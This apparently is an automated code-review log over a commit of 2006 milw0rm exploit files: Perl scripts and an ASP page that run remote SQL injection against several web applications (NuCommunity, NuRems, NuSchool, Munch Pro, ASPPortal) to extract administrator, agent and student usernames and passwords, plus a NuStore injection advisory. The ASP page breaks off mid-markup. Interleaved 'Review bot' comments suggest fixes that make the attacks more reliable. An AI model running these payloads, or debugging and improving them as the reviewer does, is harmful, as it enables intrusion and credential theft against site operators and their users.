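Review bot: the two failure checks (`/Ad removed or not yet approved/` and `/Internal Server Error/`) are applied only inside the second loop that reads `$socket1`, never to the first response on `$socket`, so a failed first request falls through to the generic "Exploit failed" line with no indication of why; move the checks into a shared subroutine used by both loops. The "Ad removed or not yet approved" string also looks copied from a classifieds script rather than a poll, and the username regex `/ltext\">(.*?)<\/td>/` matches any cell with that class, so a normal page can be reported as "Exploit succeed!" with an unrelated value. Minor: `s/(http:\/\/)//eg` carries an `/e` flag on an empty replacement, which does nothing, and the usage text says `class.pl` while both examples say `exploit.pl`.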


@ -1,85 +1,85 @@
#!/usr/bin/perl #!/usr/bin/perl
#[Script Name: NuCommunity 1.0 (cl_CatListing.asp) Remote SQL Injection Exploit #[Script Name: NuCommunity 1.0 (cl_CatListing.asp) Remote SQL Injection Exploit
#[Coded by : ajann #[Coded by : ajann
#[Author : ajann #[Author : ajann
#[Contact : :( #[Contact : :(
use IO::Socket; use IO::Socket;
if(@ARGV < 3){ if(@ARGV < 3){
print " print "
[======================================================================== [========================================================================
[// NuCommunity 1.0 (cl_CatListing.asp) Remote SQL Injection Exploit [// NuCommunity 1.0 (cl_CatListing.asp) Remote SQL Injection Exploit
[// Usage: exploit.pl [target] [path] [userid] [// Usage: exploit.pl [target] [path] [userid]
[// Example: exploit.pl victim.com / 1 [// Example: exploit.pl victim.com / 1
[// Example: exploit.pl victim.com /path/ 1 [// Example: exploit.pl victim.com /path/ 1
[// Vuln&Exp : ajann [// Vuln&Exp : ajann
[======================================================================== [========================================================================
"; ";
exit(); exit();
} }
#Local variables #Local variables
$server = $ARGV[0]; $server = $ARGV[0];
$server =~ s/(http:\/\/)//eg; $server =~ s/(http:\/\/)//eg;
$host = "http://".$server; $host = "http://".$server;
$port = "80"; $port = "80";
$dir = $ARGV[1]; $dir = $ARGV[1];
$file = "cl_CatListing.asp?cl_cat_ID="; $file = "cl_CatListing.asp?cl_cat_ID=";
$target = "-1%20union%20select%200,0,0,admin_user%20from%20admin+where+admin_id%20like%20".$ARGV[2]; $target = "-1%20union%20select%200,0,0,admin_user%20from%20admin+where+admin_id%20like%20".$ARGV[2];
$target = $host.$dir.$file.$target; $target = $host.$dir.$file.$target;
$targettwo = "-1%20union%20select%200,0,0,admin_password%20from%20admin+where+admin_id%20like%20".$ARGV[2]; $targettwo = "-1%20union%20select%200,0,0,admin_password%20from%20admin+where+admin_id%20like%20".$ARGV[2];
$targettwo = $host.$dir.$file.$targettwo; $targettwo = $host.$dir.$file.$targettwo;
#Writing data to socket #Writing data to socket
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
print "+ Trying to connect: $server\n"; print "+ Trying to connect: $server\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n"; $socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $socket "GET $target\n"; print $socket "GET $target\n";
print $socket "Host: $server\n"; print $socket "Host: $server\n";
print $socket "Accept: */*\n"; print $socket "Accept: */*\n";
print $socket "Connection: close\n\n"; print $socket "Connection: close\n\n";
print "+ Connected!...\n"; print "+ Connected!...\n";
#Getting #Getting
while($answer = <$socket>) { while($answer = <$socket>) {
if ($answer =~ /t size=\"2\">(.*?)<\/font>/){ if ($answer =~ /t size=\"2\">(.*?)<\/font>/){
print "+ Exploit succeed! Getting admin information.\n"; print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n"; print "+ ---------------- +\n";
print "+ Username: $1\n"; print "+ Username: $1\n";
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
print "+ Trying to connect for Password: $server\n"; print "+ Trying to connect for Password: $server\n";
$socket1 = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n"; $socket1 = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $socket1 "GET $targettwo\n"; print $socket1 "GET $targettwo\n";
print $socket1 "Host: $server\n"; print $socket1 "Host: $server\n";
print $socket1 "Accept: */*\n"; print $socket1 "Accept: */*\n";
print $socket1 "Connection: close\n\n"; print $socket1 "Connection: close\n\n";
print "+ Connected!...\n"; print "+ Connected!...\n";
#Getting #Getting
while($answer = <$socket1>) { while($answer = <$socket1>) {
if ($answer =~ /t size=\"2\">(.*?)<\/font>/){ if ($answer =~ /t size=\"2\">(.*?)<\/font>/){
print "+ Exploit succeed! Getting admin information.\n"; print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n"; print "+ ---------------- +\n";
print "+ Password: $1\n"; print "+ Password: $1\n";
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
exit(); exit();
} }
if ($answer =~ /Ad removed or not yet approved/) { if ($answer =~ /Ad removed or not yet approved/) {
print "+ Exploit Failed : ( \n"; print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
exit(); exit();
} }
if ($answer =~ /Internal Server Error/) { if ($answer =~ /Internal Server Error/) {
print "+ Exploit Failed : ( \n"; print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
exit(); exit();
} }
} }
} }
} }
print "+ Exploit failed :(\n"; print "+ Exploit failed :(\n";
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
# milw0rm.com [2006-11-11] # milw0rm.com [2006-11-11]
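Review bot: the request built at `print $socket "GET $target\n";` carries no HTTP version and uses bare `\n` line endings, so the server sees an HTTP/0.9 simple request and the `Host:`, `Accept:` and `Connection:` lines that follow are not headers of a valid HTTP/1.x request; send `GET $target HTTP/1.0\r\n`, terminate every header with `\r\n` and finish with an empty `\r\n` line. The same request construction is repeated verbatim in the other Perl scripts of this commit, so fix it in all of them. The two columns of this hunk are identical, so the change itself appears to be whitespace or line-ending only and nothing in the logic has moved.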


@ -1,73 +1,73 @@
#!/usr/bin/perl #!/usr/bin/perl
#[Script Name: NuRems 1.0 (propertysdetails.asp) Remote SQL Injection Exploit #[Script Name: NuRems 1.0 (propertysdetails.asp) Remote SQL Injection Exploit
#[Coded by : ajann #[Coded by : ajann
#[Author : ajann #[Author : ajann
#[Contact : :( #[Contact : :(
use IO::Socket; use IO::Socket;
if(@ARGV < 3){ if(@ARGV < 3){
print " print "
[======================================================================== [========================================================================
[// NuRems 1.0 (propertysdetails.asp) Remote SQL Injection Exploit [// NuRems 1.0 (propertysdetails.asp) Remote SQL Injection Exploit
[// Usage: class.pl [target] [path] [userid] [// Usage: class.pl [target] [path] [userid]
[// Example: exploit.pl victim.com / 1 [// Example: exploit.pl victim.com / 1
[// Example: exploit.pl victim.com /path/ 1 [// Example: exploit.pl victim.com /path/ 1
[// Vuln&Exp : ajann [// Vuln&Exp : ajann
[======================================================================== [========================================================================
"; ";
exit(); exit();
} }
#Local variables #Local variables
$server = $ARGV[0]; $server = $ARGV[0];
$server =~ s/(http:\/\/)//eg; $server =~ s/(http:\/\/)//eg;
$host = "http://".$server; $host = "http://".$server;
$port = "80"; $port = "80";
$dir = $ARGV[1]; $dir = $ARGV[1];
$file = "propertysdetails.asp?PropID="; $file = "propertysdetails.asp?PropID=";
$target = "16%20union%20select%200,Username,password,Email,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20agents%20where%20AgentID%20like%20".$ARGV[2]; $target = "16%20union%20select%200,Username,password,Email,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20agents%20where%20AgentID%20like%20".$ARGV[2];
$target = $host.$dir.$file.$target; $target = $host.$dir.$file.$target;
#Writing data to socket #Writing data to socket
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
print "+ Trying to connect: $server\n"; print "+ Trying to connect: $server\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n"; $socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $socket "GET $target\n"; print $socket "GET $target\n";
print $socket "Host: $server\n"; print $socket "Host: $server\n";
print $socket "Accept: */*\n"; print $socket "Accept: */*\n";
print $socket "Connection: close\n\n"; print $socket "Connection: close\n\n";
print "+ Connected!...\n"; print "+ Connected!...\n";
#Getting #Getting
while($answer = <$socket>) { while($answer = <$socket>) {
if ($answer =~ /Location:(.*?)<\/font>/){ if ($answer =~ /Location:(.*?)<\/font>/){
print "+ Exploit succeed! Getting admin information.\n"; print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n"; print "+ ---------------- +\n";
print "+ Username: $1\n"; print "+ Username: $1\n";
} }
if ($answer =~ /Address:(.*?)<\/font>/){ if ($answer =~ /Address:(.*?)<\/font>/){
print "+ Password: $1\n"; print "+ Password: $1\n";
} }
if ($answer =~ /# Rooms:(.*?)<\/font>/){ if ($answer =~ /# Rooms:(.*?)<\/font>/){
print "+ Email: $1\n"; print "+ Email: $1\n";
exit(); exit();
} }
if ($answer =~ /Ad removed or not yet approved/) { if ($answer =~ /Ad removed or not yet approved/) {
print "+ Exploit Failed : ( \n"; print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
exit(); exit();
} }
if ($answer =~ /Internal Server Error/) { if ($answer =~ /Internal Server Error/) {
print "+ Exploit Failed : ( \n"; print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
exit(); exit();
} }
} }
print "+ Exploit failed :(\n"; print "+ Exploit failed :(\n";
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
# milw0rm.com [2006-11-11] # milw0rm.com [2006-11-11]
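Review bot: the usage banner `[// Usage: class.pl [target] [path] [userid]` names the script `class.pl` while the two example lines directly below it invoke `exploit.pl`; make the name consistent with the other banners in this commit. A logic point in the payload: `propertysdetails.asp?PropID=16 union select ...` starts from an apparently real record id (16) instead of the `-1` the sibling scripts use, so the page renders the genuine property first; the `Location:`, `Address:` and `# Rooms:` regexes capture that record's fields, print them as username, password and email, and `exit()` before the injected `Username,password,Email` row is ever reached. Also `$server =~ s/(http:\/\/)//eg;` applies the `/e` flag to an empty replacement, which evaluates nothing; `s{^http://}{}` is what is meant.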


@ -1,20 +1,20 @@
******************************************************************************* *******************************************************************************
# Title : NuStore 1.0 (Products.asp) Remote SQL Injection Vulnerability # Title : NuStore 1.0 (Products.asp) Remote SQL Injection Vulnerability
# Author : ajann # Author : ajann
******************************************************************************* *******************************************************************************
###http://[target]/[path]/Products.asp?CategoryID=-1&SubCatagoryID=[ SQL ] ###http://[target]/[path]/Products.asp?CategoryID=-1&SubCatagoryID=[ SQL ]
Example: Example:
//Products.asp?CategoryID=-1&SubCatagoryID=-1%20union%20select%200,0,pass,0%20from%20customers%20where%20no=0 //Products.asp?CategoryID=-1&SubCatagoryID=-1%20union%20select%200,0,pass,0%20from%20customers%20where%20no=0
//Products.asp?CategoryID=-1&SubCatagoryID=-1%20union%20select%200,0,pass,0%20from%20customeremail%20where%20no=0 //Products.asp?CategoryID=-1&SubCatagoryID=-1%20union%20select%200,0,pass,0%20from%20customeremail%20where%20no=0
""""""""""""""""""""" """""""""""""""""""""
# ajann,Turkey # ajann,Turkey
# ... # ...
# Im not Hacker! # Im not Hacker!
# milw0rm.com [2006-11-11] # milw0rm.com [2006-11-11]
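Review bot: the header block has no `# Vendor:` line, unlike the UStore, USupport and UPublisher advisories in this same commit, and neither example explains the `where no=0` filter, so a reader cannot tell whether `no` is the customer key or a placeholder to be replaced; add the vendor URL and a one-line note on which row `no=0` selects, or use the `like [id]` form the other advisories use. The two examples differ only in the table name (`customers` versus `customeremail`) while both select a `pass` column, which deserves a sentence on why two tables hold that column.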


@ -1,69 +1,69 @@
#!/usr/bin/perl #!/usr/bin/perl
#[Script Name: NuSchool 1.0 (CampusNewsDetails.asp) Remote SQL Injection Exploit #[Script Name: NuSchool 1.0 (CampusNewsDetails.asp) Remote SQL Injection Exploit
#[Coded by : ajann #[Coded by : ajann
#[Author : ajann #[Author : ajann
#[Contact : :( #[Contact : :(
use IO::Socket; use IO::Socket;
if(@ARGV < 3){ if(@ARGV < 3){
print " print "
[======================================================================== [========================================================================
[// NuSchool 1.0 (CampusNewsDetails.asp) Remote SQL Injection Exploit [// NuSchool 1.0 (CampusNewsDetails.asp) Remote SQL Injection Exploit
[// Usage: exploit.pl [target] [path] [userid] [// Usage: exploit.pl [target] [path] [userid]
[// Example: exploit.pl victim.com / 1 [// Example: exploit.pl victim.com / 1
[// Example: exploit.pl victim.com /path/ 1 [// Example: exploit.pl victim.com /path/ 1
[// Vuln&Exp : ajann [// Vuln&Exp : ajann
[======================================================================== [========================================================================
"; ";
exit(); exit();
} }
#Local variables #Local variables
$server = $ARGV[0]; $server = $ARGV[0];
$server =~ s/(http:\/\/)//eg; $server =~ s/(http:\/\/)//eg;
$host = "http://".$server; $host = "http://".$server;
$port = "80"; $port = "80";
$dir = $ARGV[1]; $dir = $ARGV[1];
$file = "CampusNewsDetails.asp?NewsID="; $file = "CampusNewsDetails.asp?NewsID=";
$target = "-1%20union%20select%2000,UserName,Password,0%20from%20students%20where%20StudentID%20like%20".$ARGV[2]; $target = "-1%20union%20select%2000,UserName,Password,0%20from%20students%20where%20StudentID%20like%20".$ARGV[2];
$target = $host.$dir.$file.$target; $target = $host.$dir.$file.$target;
#Writing data to socket #Writing data to socket
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
print "+ Trying to connect: $server\n"; print "+ Trying to connect: $server\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n"; $socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $socket "GET $target\n"; print $socket "GET $target\n";
print $socket "Host: $server\n"; print $socket "Host: $server\n";
print $socket "Accept: */*\n"; print $socket "Accept: */*\n";
print $socket "Connection: close\n\n"; print $socket "Connection: close\n\n";
print "+ Connected!...\n"; print "+ Connected!...\n";
#Getting #Getting
while($answer = <$socket>) { while($answer = <$socket>) {
if ($answer =~ /<td width=\"21%\"><font size=\"2\" face=\"Arial, Helvetica, sans-serif\">(.*?)<\/font>/){ if ($answer =~ /<td width=\"21%\"><font size=\"2\" face=\"Arial, Helvetica, sans-serif\">(.*?)<\/font>/){
print "+ Exploit succeed! Getting admin information.\n"; print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n"; print "+ ---------------- +\n";
print "+ Username: $1\n"; print "+ Username: $1\n";
} }
if ($answer =~ /<td colspan=\"2\"><font size=\"2\" face=\"Arial, Helvetica, sans-serif\">(.*?)<\/font>/){ if ($answer =~ /<td colspan=\"2\"><font size=\"2\" face=\"Arial, Helvetica, sans-serif\">(.*?)<\/font>/){
print "+ Password: $1\n"; print "+ Password: $1\n";
exit(); exit();
} }
if ($answer =~ /Ad removed or not yet approved/) { if ($answer =~ /Ad removed or not yet approved/) {
print "+ Exploit Failed : ( \n"; print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
exit(); exit();
} }
if ($answer =~ /Internal Server Error/) { if ($answer =~ /Internal Server Error/) {
print "+ Exploit Failed : ( \n"; print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
exit(); exit();
} }
} }
print "+ Exploit failed :(\n"; print "+ Exploit failed :(\n";
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
# milw0rm.com [2006-11-11] # milw0rm.com [2006-11-11]
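Review bot: the success line `+ Exploit succeed! Getting admin information.` is misleading for this script, because the payload reads `UserName,Password` from the `students` table filtered by `StudentID`; say "student information" or make the table a parameter. Two smaller points: `union select 00,UserName,Password,0` has a stray `00` where every other script uses `0` (harmless as a numeric literal, but it reads as a typo), and both extraction regexes are pinned to the exact `<td width="21%"><font size="2" face="Arial, Helvetica, sans-serif">` markup, so any template difference on the target makes the script fall through to `Exploit failed :(` even when the injected row came back.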


@ -1,69 +1,69 @@
#!/usr/bin/perl #!/usr/bin/perl
#[Script Name: Munch Pro 1.0 (switch.asp) Remote SQL Injection Exploit #[Script Name: Munch Pro 1.0 (switch.asp) Remote SQL Injection Exploit
#[Coded by : ajann #[Coded by : ajann
#[Author : ajann #[Author : ajann
#[Contact : :( #[Contact : :(
use IO::Socket; use IO::Socket;
if(@ARGV < 3){ if(@ARGV < 3){
print " print "
[======================================================================== [========================================================================
[// Munch Pro 1.0 (switch.asp) Remote SQL Injection Exploit [// Munch Pro 1.0 (switch.asp) Remote SQL Injection Exploit
[// Usage: exploit.pl [target] [path] [userid] [// Usage: exploit.pl [target] [path] [userid]
[// Example: exploit.pl victim.com / 1 [// Example: exploit.pl victim.com / 1
[// Example: exploit.pl victim.com /path/ 1 [// Example: exploit.pl victim.com /path/ 1
[// Vuln&Exp : ajann [// Vuln&Exp : ajann
[======================================================================== [========================================================================
"; ";
exit(); exit();
} }
#Local variables #Local variables
$server = $ARGV[0]; $server = $ARGV[0];
$server =~ s/(http:\/\/)//eg; $server =~ s/(http:\/\/)//eg;
$host = "http://".$server; $host = "http://".$server;
$port = "80"; $port = "80";
$dir = $ARGV[1]; $dir = $ARGV[1];
$file = "switch.asp?pg=subMenu&catid="; $file = "switch.asp?pg=subMenu&catid=";
$target = "-1%20union%20select%200,0,username,0,password,0%20from%20users%20where%20id%20like%20".$ARGV[2]; $target = "-1%20union%20select%200,0,username,0,password,0%20from%20users%20where%20id%20like%20".$ARGV[2];
$target = $host.$dir.$file.$target; $target = $host.$dir.$file.$target;
#Writing data to socket #Writing data to socket
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
print "+ Trying to connect: $server\n"; print "+ Trying to connect: $server\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n"; $socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $socket "GET $target\n"; print $socket "GET $target\n";
print $socket "Host: $server\n"; print $socket "Host: $server\n";
print $socket "Accept: */*\n"; print $socket "Accept: */*\n";
print $socket "Connection: close\n\n"; print $socket "Connection: close\n\n";
print "+ Connected!...\n"; print "+ Connected!...\n";
#Getting #Getting
while($answer = <$socket>) { while($answer = <$socket>) {
if ($answer =~ /74%\"><font color=\"#000000\"><strong>(.*?)<\/strong><br>/){ if ($answer =~ /74%\"><font color=\"#000000\"><strong>(.*?)<\/strong><br>/){
print "+ Exploit succeed! Getting admin information.\n"; print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n"; print "+ ---------------- +\n";
print "+ Username: $1\n"; print "+ Username: $1\n";
} }
if ($answer =~ /17%\" align=\"center\"><Font Color=\"#000000\"><strong>(.*?)<\/strong><\/Font><\/TD>/){ if ($answer =~ /17%\" align=\"center\"><Font Color=\"#000000\"><strong>(.*?)<\/strong><\/Font><\/TD>/){
print "+ Password: $1\n"; print "+ Password: $1\n";
exit(); exit();
} }
if ($answer =~ /Under Construction, Please check back soon.../) { if ($answer =~ /Under Construction, Please check back soon.../) {
print "+ Exploit Failed : ( \n"; print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
exit(); exit();
} }
if ($answer =~ /Internal Server Error/) { if ($answer =~ /Internal Server Error/) {
print "+ Exploit Failed : ( \n"; print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
exit(); exit();
} }
} }
print "+ Exploit failed :(\n"; print "+ Exploit failed :(\n";
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
# milw0rm.com [2006-11-12] # milw0rm.com [2006-11-12]
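Review bot: the response is consumed one line at a time in `while($answer = <$socket>)`, and both success regexes require the cell attributes, the `<strong>` tag and the captured value to sit on a single line; if the target wraps that markup, the script reports `Exploit failed :(` although the injected row was returned. Read the whole body once (`local $/; my $body = <$socket>;`) and match the regexes against `$body`. Separately, the username branch prints `Exploit succeed!` and keeps looping, but when the password regex never matches the script still ends with `Exploit failed :(`, so a single run can print both verdicts; set a flag in the success branches and print one final status after the loop.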


@ -1,192 +1,192 @@
<% Response.Buffer = True %> <% Response.Buffer = True %>
<% On Error Resume Next %> <% On Error Resume Next %>
<% Server.ScriptTimeout = 100 %> <% Server.ScriptTimeout = 100 %>
<% <%
'=============================================================================================== '===============================================================================================
'[Script Name: ASPPortal <= 4.0.0(default1.asp) Remote SQL Injection Exploit '[Script Name: ASPPortal <= 4.0.0(default1.asp) Remote SQL Injection Exploit
'[Coded by : ajann '[Coded by : ajann
'[Author : ajann '[Author : ajann
'[Contact : :( '[Contact : :(
'[ExploitName: exploit1.asp '[ExploitName: exploit1.asp
'[Note : exploit file name =>exploit1.asp '[Note : exploit file name =>exploit1.asp
'[Using : Write Target and ID after Submit Click '[Using : Write Target and ID after Submit Click
'[Using : Tr:Alýnan Sifreyi Perl scriptinde cözün. '[Using : Tr:Alýnan Sifreyi Perl scriptinde cözün.
'[Using : Tr:Scriptin Tr Dilinde bu exploitle bilgileri alamassiniz,manuel cekebilirsiniz '[Using : Tr:Scriptin Tr Dilinde bu exploitle bilgileri alamassiniz,manuel cekebilirsiniz
'[Using : Tr:Kimsenin boyle yapicak kadar seviyesiz oldunu düsünmüyorum. '[Using : Tr:Kimsenin boyle yapicak kadar seviyesiz oldunu düsünmüyorum.
'=============================================================================================== '===============================================================================================
'use sub decrypt() from http://www.milw0rm.com/exploits/1597 to decrypt /str0ke 'use sub decrypt() from http://www.milw0rm.com/exploits/1597 to decrypt /str0ke
%> %>
<html> <html>
<title>ASPPortal <= 4.0.0 (default1.asp) Remote SQL Injection Exploit</title> <title>ASPPortal <= 4.0.0 (default1.asp) Remote SQL Injection Exploit</title>
<head> <head>
<script language="JavaScript"> <script language="JavaScript">
function functionControl1(){ function functionControl1(){
setTimeout("functionControl2()",2000); setTimeout("functionControl2()",2000);
} }
function functionControl2(){ function functionControl2(){
if(document.form1.field1.value==""){ if(document.form1.field1.value==""){
alert("[Exploit Failed]=>The Username and Password Didnt Take,Try Again"); alert("[Exploit Failed]=>The Username and Password Didnt Take,Try Again");
} }
} }
function writetext() { function writetext() {
if(document.form1.field1.value==""){ if(document.form1.field1.value==""){
document.getElementById('htmlAlani').innerHTML='<font face=\"Verdana\" size=\"1\" color=\"#008000\">There is a problem... The Data Didn\'t Take </font>' document.getElementById('htmlAlani').innerHTML='<font face=\"Verdana\" size=\"1\" color=\"#008000\">There is a problem... The Data Didn\'t Take </font>'
} }
} }
function write(){ function write(){
setTimeout("writetext()",1000); setTimeout("writetext()",1000);
} }
</script> </script>
</head> </head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254"> <meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
<body bgcolor="#000000" link="#008000" vlink="#008000" alink="#008000"> <body bgcolor="#000000" link="#008000" vlink="#008000" alink="#008000">
<center> <center>
<font face="Verdana" size="2" color="#008000"><b><a href="exploit1.asp">ASPPortal &lt;=</b>v4.0.0(default1.asp) <u><b> <font face="Verdana" size="2" color="#008000"><b><a href="exploit1.asp">ASPPortal &lt;=</b>v4.0.0(default1.asp) <u><b>
Remote SQL Injection Exploit</b></u></a></font><br><br> Remote SQL Injection Exploit</b></u></a></font><br><br>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080"> <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080">
<tr> <tr>
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';"> <td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">
<font face="Arial" size="1"><b><font color="#FFFFFF">TARGET:</font>Example:[http://x.com/path]</b></font><p> <font face="Arial" size="1"><b><font color="#FFFFFF">TARGET:</font>Example:[http://x.com/path]</b></font><p>
<b><font face="Arial" size="1" color="#FFFFFF">USER ID:</font></b><font face="Arial" size="1"><b>Example:[User <b><font face="Arial" size="1" color="#FFFFFF">USER ID:</font></b><font face="Arial" size="1"><b>Example:[User
ID=1]</b></font></td> ID=1]</b></font></td>
<td width="50%"><center> <td width="50%"><center>
<form method="post" name="form1" action="exploit1.asp?islem=get"> <form method="post" name="form1" action="exploit1.asp?islem=get">
<input type="text" name="text1" value="http://" size="25" style="background-color: #808080"><br><input type="text" name="id" value="1" size="25" style="background-color: #808080"> <input type="text" name="text1" value="http://" size="25" style="background-color: #808080"><br><input type="text" name="id" value="1" size="25" style="background-color: #808080">
<input type="submit" value="Get"></center></td> <input type="submit" value="Get"></center></td>
</tr> </tr>
</table> </table>
<div id=htmlAlani></div> <div id=htmlAlani></div>
<% <%
islem = Request.QueryString("islem") islem = Request.QueryString("islem")
If islem = "hata1" Then If islem = "hata1" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please complete to the whole spaces</font>" Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please complete to the whole spaces</font>"
End If End If
If islem = "hata2" Then If islem = "hata2" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please right character use</font>" Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please right character use</font>"
End If End If
If islem = "hata3" Then If islem = "hata3" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Add ""http://""</font>" Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Add ""http://""</font>"
End If End If
%> %>
<% <%
If islem = "get" Then If islem = "get" Then
string1="default1.asp" string1="default1.asp"
string2="default1.asp" string2="default1.asp"
cek= Request.Form("id") cek= Request.Form("id")
targettext = Request.Form("text1") targettext = Request.Form("text1")
arama=InStr(1, targettext, "union" ,1) arama=InStr(1, targettext, "union" ,1)
arama2=InStr(1, targettext, "http://" ,1) arama2=InStr(1, targettext, "http://" ,1)
If targettext="" Then If targettext="" Then
Response.Redirect("exploit1.asp?islem=hata1") Response.Redirect("exploit1.asp?islem=hata1")
Else Else
If arama>0 then If arama>0 then
Response.Redirect("exploit1.asp?islem=hata2") Response.Redirect("exploit1.asp?islem=hata2")
Else Else
If arama2=0 then If arama2=0 then
Response.Redirect("exploit1.asp?islem=hata3") Response.Redirect("exploit1.asp?islem=hata3")
Else Else
%> %>
<% <%
target1 = targettext+string1 target1 = targettext+string1
target2 = targettext+string2 target2 = targettext+string2
Public Function take(come) Public Function take(come)
Set objtake = Server.CreateObject("Microsoft.XMLHTTP" ) Set objtake = Server.CreateObject("Microsoft.XMLHTTP" )
With objtake With objtake
.Open "POST" , come, FALSE .Open "POST" , come, FALSE
.setRequestHeader "Content-Type", "application/x-www-form-urlencoded" .setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
.send "Voteit=1&Poll_ID=-1%20union%20select%200,username,0,0,0,0,0,0,0%20from%20users%20where%20user_id%20like%20"+cek .send "Voteit=1&Poll_ID=-1%20union%20select%200,username,0,0,0,0,0,0,0%20from%20users%20where%20user_id%20like%20"+cek
take = .Responsetext take = .Responsetext
End With End With
SET objtake = Nothing SET objtake = Nothing
End Function End Function
Public Function take1(come1) Public Function take1(come1)
Set objtake1 = Server.CreateObject("Microsoft.XMLHTTP" ) Set objtake1 = Server.CreateObject("Microsoft.XMLHTTP" )
With objtake1 With objtake1
.Open "POST" , come1, FALSE .Open "POST" , come1, FALSE
.setRequestHeader "Content-Type", "application/x-www-form-urlencoded" .setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
.send "Voteit=1&Poll_ID=-1%20union%20select%200,password,0,0,0,0,0,0,0%20from%20users%20where%20user_id%20like%20"+cek .send "Voteit=1&Poll_ID=-1%20union%20select%200,password,0,0,0,0,0,0,0%20from%20users%20where%20user_id%20like%20"+cek
take1 = .Responsetext take1 = .Responsetext
End With End With
SET objtake1 = Nothing SET objtake1 = Nothing
End Function End Function
get_username = take(target1) get_username = take(target1)
get_password = take1(target2) get_password = take1(target2)
getdata=InStr(get_username,"Poll Question:</b>&nbsp;" ) getdata=InStr(get_username,"Poll Question:</b>&nbsp;" )
username=Mid(get_username,getdata+24,14) username=Mid(get_username,getdata+24,14)
passwd=Mid(get_password,getdata+24,14) passwd=Mid(get_password,getdata+24,14)
%> %>
<center> <center>
<font face="Verdana" size="2" color="#008000"> <u><b> <font face="Verdana" size="2" color="#008000"> <u><b>
ajann<br></b></u></font> ajann<br></b></u></font>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080"> <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080">
<tr> <tr>
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
